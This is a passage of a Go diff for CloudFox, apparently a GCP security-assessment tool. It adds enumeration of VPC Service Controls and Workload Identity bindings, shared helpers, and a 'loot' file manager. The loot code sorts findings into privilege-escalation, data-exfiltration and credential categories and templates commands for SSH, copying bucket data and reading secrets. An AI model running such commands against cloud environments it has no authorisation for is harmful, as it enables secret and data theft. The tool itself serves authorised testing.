service.AccessPolicies.ServicePerimeters.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListServicePerimetersResponse) error { + for _, perimeter := range page.ServicePerimeters { + info := s.parsePerimeter(perimeter, policyName) + perimeters = append(perimeters, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return perimeters, nil +} + +// ListAccessLevels retrieves all access levels for an access policy +func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePerimeter, policyName string) ServicePerimeterInfo { + info := ServicePerimeterInfo{ + Name: extractPerimeterName(perimeter.Name), + Title: perimeter.Title, + PolicyName: policyName, + PerimeterType: perimeter.PerimeterType, + Description: perimeter.Description, + } + + // Parse status configuration + if perimeter.Status != nil { + info.Resources = perimeter.Status.Resources + info.RestrictedServices = perimeter.Status.RestrictedServices + info.AccessLevels = perimeter.Status.AccessLevels + + if perimeter.Status.VpcAccessibleServices != nil { + info.VPCAccessibleServices = 
perimeter.Status.VpcAccessibleServices.AllowedServices + } + + if len(perimeter.Status.IngressPolicies) > 0 { + info.IngressPolicyCount = len(perimeter.Status.IngressPolicies) + info.HasIngressRules = true + } + + if len(perimeter.Status.EgressPolicies) > 0 { + info.EgressPolicyCount = len(perimeter.Status.EgressPolicies) + info.HasEgressRules = true + } + } + + return info +} + +func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + PolicyName: policyName, + Description: level.Description, + } + + if level.Basic != nil && len(level.Basic.Conditions) > 0 { + for _, condition := range level.Basic.Conditions { + info.IPSubnetworks = append(info.IPSubnetworks, condition.IpSubnetworks...) + info.Regions = append(info.Regions, condition.Regions...) + info.Members = append(info.Members, condition.Members...) + } + } + + // Handle custom access levels (CEL expressions) + if level.Custom != nil && level.Custom.Expr != nil && level.Custom.Expr.Expression != "" { + info.Description = fmt.Sprintf("Custom CEL: %s", level.Custom.Expr.Expression) + } + + return info +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractPerimeterName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go new file mode 100644 index 00000000..d2f4206b --- /dev/null +++ 
b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -0,0 +1,244 @@ +package workloadidentityservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + iam "google.golang.org/api/iam/v1" +) + +type WorkloadIdentityService struct{ + session *gcpinternal.SafeSession +} + +func New() *WorkloadIdentityService { + return &WorkloadIdentityService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *WorkloadIdentityService { + return &WorkloadIdentityService{ + session: session, + } +} + +// getIAMService returns an IAM service client using cached session if available +func (s *WorkloadIdentityService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// WorkloadIdentityPool represents a Workload Identity Pool +type WorkloadIdentityPool struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + State string `json:"state"` + Disabled bool `json:"disabled"` + PoolID string `json:"poolId"` +} + +// WorkloadIdentityProvider represents a Workload Identity Pool Provider +type WorkloadIdentityProvider struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string `json:"attributeCondition"` // CEL expression + // AWS specific + AWSAccountID string `json:"awsAccountId"` + // OIDC specific + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string 
`json:"allowedAudiences"` +} + +// FederatedIdentityBinding represents a binding from federated identity to GCP SA +type FederatedIdentityBinding struct { + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` +} + +// ListWorkloadIdentityPools lists all Workload Identity Pools in a project +func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var pools []WorkloadIdentityPool + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolsResponse) error { + for _, pool := range page.WorkloadIdentityPools { + // Extract pool ID from name + // Format: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID + poolID := extractLastPart(pool.Name) + + pools = append(pools, WorkloadIdentityPool{ + Name: pool.Name, + DisplayName: pool.DisplayName, + Description: pool.Description, + ProjectID: projectID, + State: pool.State, + Disabled: pool.Disabled, + PoolID: poolID, + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return pools, nil +} + +// ListWorkloadIdentityProviders lists all providers in a pool +func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var providers 
[]WorkloadIdentityProvider + parent := fmt.Sprintf("projects/%s/locations/global/workloadIdentityPools/%s", projectID, poolID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.Providers.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolProvidersResponse) error { + for _, provider := range page.WorkloadIdentityPoolProviders { + // Extract provider ID from name + providerID := extractLastPart(provider.Name) + + wip := WorkloadIdentityProvider{ + Name: provider.Name, + DisplayName: provider.DisplayName, + Description: provider.Description, + PoolID: poolID, + ProviderID: providerID, + ProjectID: projectID, + Disabled: provider.Disabled, + AttributeMapping: provider.AttributeMapping, + AttributeCondition: provider.AttributeCondition, + } + + // Determine provider type and extract specific config + if provider.Aws != nil { + wip.ProviderType = "AWS" + wip.AWSAccountID = provider.Aws.AccountId + } else if provider.Oidc != nil { + wip.ProviderType = "OIDC" + wip.OIDCIssuerURI = provider.Oidc.IssuerUri + wip.AllowedAudiences = provider.Oidc.AllowedAudiences + } else if provider.Saml != nil { + wip.ProviderType = "SAML" + } + + providers = append(providers, wip) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return providers, nil +} + +// FindFederatedIdentityBindings finds all service accounts with federated identity bindings +func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var bindings []FederatedIdentityBinding + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + saReq := iamService.Projects.ServiceAccounts.List(parent) + err = saReq.Pages(ctx, func(page 
*iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + // Get IAM policy for this service account + policyReq := iamService.Projects.ServiceAccounts.GetIamPolicy(sa.Name) + policy, pErr := policyReq.Do() + if pErr != nil { + continue + } + + // Look for federated identity bindings + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Check if this is a federated identity + // Format: principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // Or: principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + if strings.HasPrefix(member, "principal://") || strings.HasPrefix(member, "principalSet://") { + fib := s.parseFederatedIdentityBinding(member, sa.Email, projectID) + if fib != nil { + bindings = append(bindings, *fib) + } + } + } + } + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return bindings, nil +} + +// parseFederatedIdentityBinding parses a federated identity member string +func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, projectID string) *FederatedIdentityBinding { + // principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + + fib := &FederatedIdentityBinding{ + ProjectID: projectID, + GCPServiceAccount: gcpSA, + ExternalSubject: member, + } + + // Extract pool ID + if idx := strings.Index(member, "workloadIdentityPools/"); idx != -1 { + rest := member[idx+len("workloadIdentityPools/"):] + if slashIdx := strings.Index(rest, "/"); slashIdx != -1 { + fib.PoolID = rest[:slashIdx] + } + } + + return fib +} + +// 
extractLastPart extracts the last part of a resource name +func extractLastPart(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/shared/aggregate.go b/gcp/shared/aggregate.go new file mode 100644 index 00000000..9eb87fc5 --- /dev/null +++ b/gcp/shared/aggregate.go @@ -0,0 +1,239 @@ +package shared + +// AggregateFromProjects combines items from a per-project map into a single slice. +// This is a common pattern in GCP modules where data is collected per-project +// and then needs to be aggregated for output. +// +// Note: Go generics require Go 1.18+. If you need to support older versions, +// use the type-specific functions below or copy this pattern. +// +// Example usage: +// +// projectBuckets := map[string][]BucketInfo{ +// "project-a": {bucket1, bucket2}, +// "project-b": {bucket3}, +// } +// allBuckets := AggregateFromProjects(projectBuckets) +// // Result: []BucketInfo{bucket1, bucket2, bucket3} +func AggregateFromProjects[T any](projectMap map[string][]T) []T { + var result []T + for _, items := range projectMap { + result = append(result, items...) + } + return result +} + +// AggregateWithProject combines items from a per-project map and adds project context. +// The transform function receives the project ID and item, allowing you to +// enrich or transform items as they're aggregated. 
+// +// Example usage: +// +// type EnrichedItem struct { +// ProjectID string +// Name string +// } +// allItems := AggregateWithProject(projectMap, func(projectID string, item Item) EnrichedItem { +// return EnrichedItem{ProjectID: projectID, Name: item.Name} +// }) +func AggregateWithProject[T any, R any](projectMap map[string][]T, transform func(projectID string, item T) R) []R { + var result []R + for projectID, items := range projectMap { + for _, item := range items { + result = append(result, transform(projectID, item)) + } + } + return result +} + +// CountByProject returns a count of items per project +func CountByProject[T any](projectMap map[string][]T) map[string]int { + counts := make(map[string]int) + for projectID, items := range projectMap { + counts[projectID] = len(items) + } + return counts +} + +// TotalCount returns the total count across all projects +func TotalCount[T any](projectMap map[string][]T) int { + total := 0 + for _, items := range projectMap { + total += len(items) + } + return total +} + +// FilterByProject returns items only from specified projects +func FilterByProject[T any](projectMap map[string][]T, projectIDs []string) []T { + projectSet := make(map[string]bool) + for _, pid := range projectIDs { + projectSet[pid] = true + } + + var result []T + for projectID, items := range projectMap { + if projectSet[projectID] { + result = append(result, items...) 
+ } + } + return result +} + +// FilterItems returns items that match the predicate +func FilterItems[T any](items []T, predicate func(T) bool) []T { + var result []T + for _, item := range items { + if predicate(item) { + result = append(result, item) + } + } + return result +} + +// MapItems transforms each item using the provided function +func MapItems[T any, R any](items []T, transform func(T) R) []R { + result := make([]R, len(items)) + for i, item := range items { + result[i] = transform(item) + } + return result +} + +// GroupBy groups items by a key extracted from each item +func GroupBy[T any, K comparable](items []T, keyFunc func(T) K) map[K][]T { + result := make(map[K][]T) + for _, item := range items { + key := keyFunc(item) + result[key] = append(result[key], item) + } + return result +} + +// UniqueStrings returns unique strings from a slice +func UniqueStrings(items []string) []string { + seen := make(map[string]bool) + var result []string + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// FlattenStringSlices flattens a slice of string slices into a single slice +func FlattenStringSlices(slices [][]string) []string { + var result []string + for _, slice := range slices { + result = append(result, slice...) 
+ } + return result +} + +// CountByField counts items grouped by a field value +func CountByField[T any](items []T, fieldFunc func(T) string) map[string]int { + counts := make(map[string]int) + for _, item := range items { + key := fieldFunc(item) + counts[key]++ + } + return counts +} + +// SortedKeys returns the keys of a map in sorted order +// Note: This only accepts map[string]int +func SortedKeys(m map[string]int) []string { + keys := make([]string, 0, len(m)) + for k := range m { + keys = append(keys, k) + } + // Simple exchange sort (selection-style); adequate for small maps + for i := 0; i < len(keys); i++ { + for j := i + 1; j < len(keys); j++ { + if keys[i] > keys[j] { + keys[i], keys[j] = keys[j], keys[i] + } + } + } + return keys +} + +// First returns the first item matching the predicate, or nil if none found +func First[T any](items []T, predicate func(T) bool) *T { + for i := range items { + if predicate(items[i]) { + return &items[i] + } + } + return nil +} + +// Any returns true if any item matches the predicate +func Any[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if predicate(item) { + return true + } + } + return false +} + +// All returns true if all items match the predicate +func All[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if !predicate(item) { + return false + } + } + return true +} + +// None returns true if no items match the predicate +func None[T any](items []T, predicate func(T) bool) bool { + return !Any(items, predicate) +} + +// Contains checks if a slice contains a specific value +func Contains[T comparable](items []T, value T) bool { + for _, item := range items { + if item == value { + return true + } + } + return false +} + +// ContainsString checks if a string slice contains a specific string +func ContainsString(items []string, value string) bool { + return Contains(items, value) +} + +// Deduplicate removes duplicate items from a slice (preserves order) +func Deduplicate[T 
comparable](items []T) []T { + seen := make(map[T]bool) + var result []T + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// Partition splits items into two slices based on a predicate +// First slice contains items where predicate is true, +// second slice contains items where predicate is false +func Partition[T any](items []T, predicate func(T) bool) ([]T, []T) { + var trueItems, falseItems []T + for _, item := range items { + if predicate(item) { + trueItems = append(trueItems, item) + } else { + falseItems = append(falseItems, item) + } + } + return trueItems, falseItems +} diff --git a/gcp/shared/doc.go b/gcp/shared/doc.go new file mode 100644 index 00000000..d1575572 --- /dev/null +++ b/gcp/shared/doc.go @@ -0,0 +1,117 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// +// This package contains helper functions and types that are used across multiple +// GCP command modules to reduce code duplication and ensure consistency. +// +// # Package Organization +// +// The shared package is organized into several files by functionality: +// +// - principals.go: IAM principal type detection and parsing utilities +// - formatting.go: Table formatting helpers (bool to string, truncation, etc.) 
+// - risk.go: Risk assessment constants, types, and utilities +// - loot.go: Loot file management and command formatting helpers +// - aggregate.go: Generic aggregation utilities for per-project data +// +// # Principal Utilities +// +// The principals.go file provides functions for working with GCP IAM principals: +// +// // Get the type of a principal +// principalType := shared.GetPrincipalType("user:admin@example.com") // "User" +// +// // Check if a principal is public +// if shared.IsPublicPrincipal("allUsers") { +// // Handle public access +// } +// +// // Extract email from principal string +// email := shared.ExtractPrincipalEmail("serviceAccount:sa@project.iam.gserviceaccount.com") +// +// # Formatting Utilities +// +// The formatting.go file provides helpers for table and output formatting: +// +// // Convert bool to display string +// shared.BoolToYesNo(true) // "Yes" +// shared.BoolToEnabled(false) // "Disabled" +// +// // Format lists for display +// shared.FormatList([]string{"a", "b", "c", "d", "e"}, 3) // "a, b, c (+2 more)" +// +// // Extract resource names from paths +// shared.ExtractResourceName("projects/my-project/locations/us-central1/functions/my-func") +// // Returns: "my-func" +// +// # Risk Assessment +// +// The risk.go file provides standardized risk assessment utilities: +// +// // Use standard risk level constants +// if riskLevel == shared.RiskCritical { +// // Handle critical risk +// } +// +// // Track risk counts +// counts := &shared.RiskCounts{} +// counts.Add(shared.RiskHigh) +// counts.Add(shared.RiskMedium) +// fmt.Println(counts.Summary()) // "1 HIGH, 1 MEDIUM" +// +// // Assess specific risks +// level := shared.AssessRoleRisk("roles/owner") // "CRITICAL" +// +// # Loot File Management +// +// The loot.go file provides helpers for creating and managing loot files: +// +// // Create a loot file manager +// lootMgr := shared.NewLootFileManager() +// +// // Initialize and add content +// lootMgr.CreateLootFile(projectID, 
"buckets-commands", +// shared.LootHeaderCommands("buckets", "Storage bucket access commands")) +// lootMgr.AddToLoot(projectID, "buckets-commands", +// shared.FormatGcloudCommand("List bucket", "gsutil ls gs://my-bucket/")) +// +// // Get formatted command strings +// cmd := shared.GcloudAccessSecretVersion("my-project", "my-secret", "latest") +// +// # Aggregation Utilities +// +// The aggregate.go file provides generic functions for combining per-project data: +// +// // Aggregate from per-project maps +// allBuckets := shared.AggregateFromProjects(projectBucketsMap) +// +// // Filter and transform +// publicBuckets := shared.FilterItems(allBuckets, func(b Bucket) bool { +// return b.IsPublic +// }) +// +// // Group by field +// bucketsByRegion := shared.GroupBy(allBuckets, func(b Bucket) string { +// return b.Region +// }) +// +// # Usage in Modules +// +// Import the shared package in GCP command modules: +// +// import ( +// "github.com/BishopFox/cloudfox/gcp/shared" +// ) +// +// func (m *MyModule) processResource(resource Resource) { +// principalType := shared.GetPrincipalType(resource.Principal) +// riskLevel := shared.AssessRoleRisk(resource.Role) +// +// if shared.IsPublicPrincipal(resource.Principal) { +// m.addToLoot(shared.FormatExploitEntry( +// "Public Access", +// "Resource is publicly accessible", +// shared.GsutilList(resource.BucketName), +// )) +// } +// } +package shared diff --git a/gcp/shared/formatting.go b/gcp/shared/formatting.go new file mode 100644 index 00000000..fc11fa68 --- /dev/null +++ b/gcp/shared/formatting.go @@ -0,0 +1,219 @@ +package shared + +import ( + "fmt" + "strings" +) + +// BoolToYesNo converts a boolean to "Yes" or "No" string. +// Useful for table display where boolean values should be human-readable. +func BoolToYesNo(b bool) string { + if b { + return "Yes" + } + return "No" +} + +// BoolToEnabled converts a boolean to "Enabled" or "Disabled" string. 
+func BoolToEnabled(b bool) string { + if b { + return "Enabled" + } + return "Disabled" +} + +// BoolToCheck converts a boolean to a checkmark or empty string. +// Useful for table columns showing presence/absence of a feature. +func BoolToCheck(b bool) string { + if b { + return "✓" + } + return "" +} + +// BoolToStatus converts a boolean to "Active" or "Inactive" string. +func BoolToStatus(b bool) string { + if b { + return "Active" + } + return "Inactive" +} + +// TruncateString truncates a string to maxLen characters, adding "..." if truncated. +func TruncateString(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 3 { + return s[:maxLen] + } + return s[:maxLen-3] + "..." +} + +// TruncateMiddle truncates a string in the middle, keeping the start and end. +// Useful for long resource names where both prefix and suffix are informative. +func TruncateMiddle(s string, maxLen int) string { + if len(s) <= maxLen { + return s + } + if maxLen <= 5 { + return s[:maxLen] + } + keepLen := (maxLen - 3) / 2 + return s[:keepLen] + "..." + s[len(s)-keepLen:] +} + +// FormatList formats a slice of strings for table display. +// If the list is longer than maxItems, it truncates and adds a count. +// +// Examples: +// - ["a", "b"] -> "a, b" +// - ["a", "b", "c", "d", "e"] with maxItems=3 -> "a, b, c (+2 more)" +func FormatList(items []string, maxItems int) string { + if len(items) == 0 { + return "-" + } + if maxItems <= 0 || len(items) <= maxItems { + return strings.Join(items, ", ") + } + shown := strings.Join(items[:maxItems], ", ") + return fmt.Sprintf("%s (+%d more)", shown, len(items)-maxItems) +} + +// FormatCount formats a count with appropriate singular/plural suffix. 
+// +// Examples: +// - FormatCount(0, "item", "items") -> "0 items" +// - FormatCount(1, "item", "items") -> "1 item" +// - FormatCount(5, "item", "items") -> "5 items" +func FormatCount(count int, singular, plural string) string { + if count == 1 { + return fmt.Sprintf("%d %s", count, singular) + } + return fmt.Sprintf("%d %s", count, plural) +} + +// FormatBytes formats a byte count as a human-readable string. +func FormatBytes(bytes int64) string { + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} + +// DefaultString returns the value if non-empty, otherwise returns the default. +func DefaultString(value, defaultValue string) string { + if value == "" { + return defaultValue + } + return value +} + +// DefaultInt returns the value if non-zero, otherwise returns the default. +func DefaultInt(value, defaultValue int) int { + if value == 0 { + return defaultValue + } + return value +} + +// JoinNonEmpty joins non-empty strings with the given separator. +// Empty strings are filtered out before joining. +func JoinNonEmpty(sep string, items ...string) string { + var nonEmpty []string + for _, item := range items { + if item != "" { + nonEmpty = append(nonEmpty, item) + } + } + return strings.Join(nonEmpty, sep) +} + +// ExtractResourceName extracts the last component from a resource path. 
+// GCP resource names often have format: projects/PROJECT/locations/LOCATION/resources/NAME +// +// Examples: +// - "projects/my-project/locations/us-central1/functions/my-func" -> "my-func" +// - "my-resource" -> "my-resource" +func ExtractResourceName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +// ExtractProjectFromResourceName extracts the project ID from a full resource name. +// GCP resources typically have format: projects/PROJECT_ID/... +// +// Returns empty string if project cannot be extracted. +func ExtractProjectFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// ExtractLocationFromResourceName extracts the location from a full resource name. +// GCP resources often have format: projects/PROJECT/locations/LOCATION/... +// +// Returns empty string if location cannot be extracted. +func ExtractLocationFromResourceName(resourceName string) string { + parts := strings.Split(resourceName, "/") + for i, part := range parts { + if (part == "locations" || part == "regions" || part == "zones") && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +// SanitizeForTable removes or replaces characters that may break table formatting. +func SanitizeForTable(s string) string { + // Replace newlines and tabs with spaces + s = strings.ReplaceAll(s, "\n", " ") + s = strings.ReplaceAll(s, "\r", " ") + s = strings.ReplaceAll(s, "\t", " ") + // Collapse multiple spaces + for strings.Contains(s, " ") { + s = strings.ReplaceAll(s, " ", " ") + } + return strings.TrimSpace(s) +} + +// FormatPermissionList formats a list of permissions for display. +// Optionally highlights dangerous permissions. 
+func FormatPermissionList(permissions []string, maxShow int) string { + if len(permissions) == 0 { + return "-" + } + return FormatList(permissions, maxShow) +} + +// FormatRoleShort shortens a role name for table display. +// Removes the "roles/" prefix if present. +// +// Examples: +// - "roles/owner" -> "owner" +// - "roles/storage.admin" -> "storage.admin" +// - "projects/my-project/roles/customRole" -> "customRole" +func FormatRoleShort(role string) string { + if strings.HasPrefix(role, "roles/") { + return strings.TrimPrefix(role, "roles/") + } + // Handle custom roles: projects/PROJECT/roles/ROLE or organizations/ORG/roles/ROLE + parts := strings.Split(role, "/roles/") + if len(parts) == 2 { + return parts[1] + } + return role +} diff --git a/gcp/shared/loot.go b/gcp/shared/loot.go new file mode 100644 index 00000000..c527a5cd --- /dev/null +++ b/gcp/shared/loot.go @@ -0,0 +1,273 @@ +package shared + +import ( + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/internal" +) + +// LootFileManager helps manage loot file creation and content addition +// for GCP modules with per-project organization. 
+type LootFileManager struct { + // LootMap stores loot files organized by projectID -> lootFileName -> LootFile + LootMap map[string]map[string]*internal.LootFile +} + +// NewLootFileManager creates a new LootFileManager +func NewLootFileManager() *LootFileManager { + return &LootFileManager{ + LootMap: make(map[string]map[string]*internal.LootFile), + } +} + +// InitializeProject ensures the project has an initialized loot map +func (l *LootFileManager) InitializeProject(projectID string) { + if l.LootMap[projectID] == nil { + l.LootMap[projectID] = make(map[string]*internal.LootFile) + } +} + +// CreateLootFile creates a new loot file for a project with a header +func (l *LootFileManager) CreateLootFile(projectID, fileName, header string) { + l.InitializeProject(projectID) + l.LootMap[projectID][fileName] = &internal.LootFile{ + Name: fileName, + Contents: header, + } +} + +// AddToLoot adds content to a loot file +func (l *LootFileManager) AddToLoot(projectID, fileName, content string) { + l.InitializeProject(projectID) + if lootFile, exists := l.LootMap[projectID][fileName]; exists && lootFile != nil { + lootFile.Contents += content + } +} + +// GetLootFile retrieves a loot file for a project +func (l *LootFileManager) GetLootFile(projectID, fileName string) *internal.LootFile { + if projectLoot, exists := l.LootMap[projectID]; exists { + return projectLoot[fileName] + } + return nil +} + +// GetAllLootFiles returns all loot files across all projects as a flat slice +func (l *LootFileManager) GetAllLootFiles() []internal.LootFile { + var allLoot []internal.LootFile + for _, projectLoot := range l.LootMap { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + allLoot = append(allLoot, *lootFile) + } + } + } + return allLoot +} + +// GetProjectLootFiles returns all loot files for a specific project +func (l *LootFileManager) GetProjectLootFiles(projectID string) []internal.LootFile { + var lootFiles []internal.LootFile + 
if projectLoot, exists := l.LootMap[projectID]; exists { + for _, lootFile := range projectLoot { + if lootFile != nil && lootFile.Contents != "" { + lootFiles = append(lootFiles, *lootFile) + } + } + } + return lootFiles +} + +// Standard loot file name suffixes +const ( + LootSuffixCommands = "commands" + LootSuffixExploitation = "exploitation" + LootSuffixEnumeration = "enumeration" + LootSuffixPrivesc = "privesc" + LootSuffixLateralMove = "lateral-movement" + LootSuffixDataExfil = "data-exfiltration" + LootSuffixHighPrivilege = "high-privilege" + LootSuffixSecurityRisks = "security-risks" + LootSuffixCredentials = "credentials" + LootSuffixSensitiveFiles = "sensitive-files" +) + +// LootFileName generates a standardized loot file name +func LootFileName(moduleName, suffix string) string { + return moduleName + "-" + suffix +} + +// Standard loot file headers + +// LootHeaderCommands returns a standard header for command loot files +func LootHeaderCommands(moduleName, description string) string { + return fmt.Sprintf(`# %s - Exploitation Commands +# Generated by CloudFox +# %s +# +# Execute these commands to interact with discovered resources. +# Always ensure you have proper authorization before running these commands. + +`, moduleName, description) +} + +// LootHeaderEnumeration returns a standard header for enumeration loot files +func LootHeaderEnumeration(moduleName, description string) string { + return fmt.Sprintf(`# %s - Further Enumeration Commands +# Generated by CloudFox +# %s +# +# Execute these commands to gather additional information. + +`, moduleName, description) +} + +// LootHeaderSecurityRisks returns a standard header for security risk loot files +func LootHeaderSecurityRisks(moduleName string) string { + return fmt.Sprintf(`# %s - Security Risks +# Generated by CloudFox +# +# This file lists potential security issues discovered during enumeration. 
+ +`, moduleName) +} + +// Command formatting helpers + +// FormatGcloudCommand formats a gcloud CLI command for loot files +func FormatGcloudCommand(comment, command string) string { + if comment != "" { + return fmt.Sprintf("# %s\n%s\n\n", comment, command) + } + return fmt.Sprintf("%s\n\n", command) +} + +// FormatGsutilCommand formats a gsutil command for loot files +func FormatGsutilCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatBqCommand formats a bq CLI command for loot files +func FormatBqCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatKubectlCommand formats a kubectl command for loot files +func FormatKubectlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatCurlCommand formats a curl command for loot files +func FormatCurlCommand(comment, command string) string { + return FormatGcloudCommand(comment, command) +} + +// FormatLootSection formats a section with a header and multiple commands +func FormatLootSection(sectionHeader string, commands []string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", sectionHeader)) + sb.WriteString(fmt.Sprintf("#############################################\n\n")) + for _, cmd := range commands { + sb.WriteString(cmd) + sb.WriteString("\n") + } + sb.WriteString("\n") + return sb.String() +} + +// FormatExploitEntry formats a single exploitation entry for loot files +func FormatExploitEntry(title, description, command string) string { + var sb strings.Builder + sb.WriteString(fmt.Sprintf("#############################################\n")) + sb.WriteString(fmt.Sprintf("# %s\n", title)) + if description != "" { + sb.WriteString(fmt.Sprintf("# %s\n", description)) + } + sb.WriteString(fmt.Sprintf("#############################################\n")) + 
sb.WriteString(command) + sb.WriteString("\n\n") + return sb.String() +} + +// FormatRiskEntry formats a risk finding for loot files +func FormatRiskEntry(riskLevel, resourceType, resourceName, description string) string { + return fmt.Sprintf("[%s] %s: %s\n Description: %s\n\n", + riskLevel, resourceType, resourceName, description) +} + +// Common GCP command templates + +// GcloudDescribeInstance returns a gcloud command to describe an instance +func GcloudDescribeInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute instances describe %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GcloudSSHInstance returns a gcloud command to SSH into an instance +func GcloudSSHInstance(projectID, zone, instanceName string) string { + return fmt.Sprintf("gcloud compute ssh %s --zone=%s --project=%s", + instanceName, zone, projectID) +} + +// GsutilList returns a gsutil command to list bucket contents +func GsutilList(bucketName string) string { + return fmt.Sprintf("gsutil ls -la gs://%s/", bucketName) +} + +// GsutilCopy returns a gsutil command to copy from a bucket +func GsutilCopy(bucketName, objectPath, localPath string) string { + if objectPath == "" { 